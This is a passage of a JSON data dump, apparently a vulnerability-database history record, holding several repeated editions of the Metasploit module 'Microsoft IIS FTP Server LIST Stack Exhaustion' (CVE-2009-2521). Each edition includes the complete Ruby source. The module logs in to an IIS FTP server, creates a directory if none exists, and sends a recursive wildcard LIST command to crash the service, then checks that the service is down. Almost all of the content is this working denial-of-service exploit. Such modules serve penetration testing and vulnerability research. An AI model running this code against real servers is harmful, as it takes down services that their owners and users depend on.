\\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2017-11-20T22:18:47", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2017-11-26T00:07:03", "history": [], "viewCount": 27, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2017-11-26T00:07:03", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2017-11-26T02:07:11", "history": [], "viewCount": 35, "enchantments": {"score": {"value": 2.6, "modified": "2017-11-26T02:07:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2017-11-26T02:07:11", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-01-02T10:02:30", "history": [], "viewCount": 35, "enchantments": {"score": {"value": 2.6, "modified": "2018-01-02T10:02:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-01-02T10:02:30", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-01-02T12:01:50", "history": [], "viewCount": 36, "enchantments": {"score": {"value": 2.6, "modified": "2018-01-02T12:01:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-01-02T12:01:50", "differentElements": ["modified", "published"], "edition": 17}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-01-05T20:01:40", "history": [], "viewCount": 36, "enchantments": {"score": {"value": 2.6, "modified": "2018-01-05T20:01:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-01-05T20:01:40", "differentElements": ["modified", "published"], "edition": 18}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-01-05T22:07:52", "history": [], "viewCount": 36, "enchantments": {"score": {"value": 2.6, "modified": "2018-01-05T22:07:52"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-01-05T22:07:52", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 